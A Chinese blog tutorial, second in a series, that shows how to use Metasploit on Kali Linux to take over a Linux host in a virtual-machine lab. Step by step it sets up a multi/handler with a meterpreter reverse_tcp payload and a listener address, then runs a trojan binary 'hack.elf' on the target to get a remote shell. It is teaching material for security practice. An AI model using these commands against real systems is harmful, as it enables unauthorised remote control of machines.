网络安全与网站安全及计算机安全:如何使用Kali Linux获取WEB网站服务器操作权限的【下】

一、背景介绍
Metasploit就是一个网络安全框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木码控制受害者主机呢?接下来让我们一起学习!

二、资源装备
1.安装好 Linux的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。

三、安全实战
3.1 启动Metasploit(msf)测试框架,如下图所示。
命令1:msfconsole
在这里插入图片描述
步骤1:利用相应的利用模块,如下图所示。
命令2:use exploit/multi/handler
在这里插入图片描述
步骤2:查看模块对应的参数,如下图所示。
命令3:show options
在这里插入图片描述
步骤3:设置对应的payload,如下图所示。
命令:set payload linux/x86/meterpreter/reverse_tcp
在这里插入图片描述
步骤4:查看该模块的相关参数,如下图所示。
命令:show options
在这里插入图片描述
步骤5:设置对应的参数,如下图所示。
命令:set lhost 193.168.78.169
在这里插入图片描述
步骤6:查看配置的参数是否成功,如下图所示。
命令:show options
在这里插入图片描述
3.2 运行木码文件,如下图所示。
步骤1:给木码文件赋予执行权限,如下图所示。
命令:chmod +x hack.elf
在这里插入图片描述
步骤2:执行木码文件,如下图所示。
命令:./hack.elf
在这里插入图片描述
3.3 运行利用模块,如下图所示。
命令:run
如下图所示,成功拿下目标主机。
在这里插入图片描述
查看目标主机的文件系统信息,如下图所示。
在这里插入图片描述
​​点我学习专业的Kali Linux安全技术​​

posted @ 2021-12-20 19:37  Kali与编程  阅读(21)  评论(0编辑  收藏  举报  来源